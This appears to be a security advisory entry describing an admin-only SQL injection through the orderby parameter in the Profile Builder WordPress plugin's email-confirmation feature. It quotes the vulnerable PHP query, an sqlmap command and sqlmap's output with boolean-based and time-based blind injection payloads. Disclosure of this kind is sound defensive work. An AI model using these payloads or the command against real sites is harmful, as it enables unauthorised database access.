The orderby parameter of the wp-admin/users.php?page=unconfirmed_emails&orderby=email&order=asc page, which is available when the "Email confirmation" setting of the plugin is activated (default is off), is not properly sanitised and validated before being concatenated in a SQL statement, leading to an SQL injection. The issue is exploitable by high privilege users such as administrators.
File: profile-builder/features/email-confirmation/class-email-confirmation.php:319-321& 345 /* handle order and orderby attr */ if( !empty( $_REQUEST['orderby'] ) ){ $orderby = sanitize_text_field( $_REQUEST['orderby'] ); if( $orderby == 'username' ) $orderby = 'user_login'; elseif ( $orderby == 'email' ) $orderby = 'user_email'; } else $orderby = 'user_login'; [...] $results = $wpdb->get_results("SELECT * FROM ".$wpdb->base_prefix."signups WHERE $where ORDER BY $orderby $order LIMIT $offset, $per_page"); python3 sqlmap.py -u "http://wptest.loc:82/wp-admin/users.php?orderby=email&page=unconfirmed_emails&order=asc" -p orderby--dbs --cookie="wordpres...." [...] sqlmap identified the following injection point(s) with a total of 225 HTTP(s) requests: --- Parameter: orderby (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: page=unconfirmed_emails&orderby=(SELECT (CASE WHEN (9360=9360) THEN 0x656d61696c ELSE (SELECT 6316 UNION SELECT 3657) END))&order=asc Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: page=unconfirmed_emails&orderby=(CASE WHEN (8207=8207) THEN SLEEP(5) ELSE 8207 END)&order=asc
Lenon Leite
Lenon Leite
Yes
2020-12-02 (about 2 years ago)
2020-12-02 (about 2 years ago)
2020-12-02 (about 2 years ago)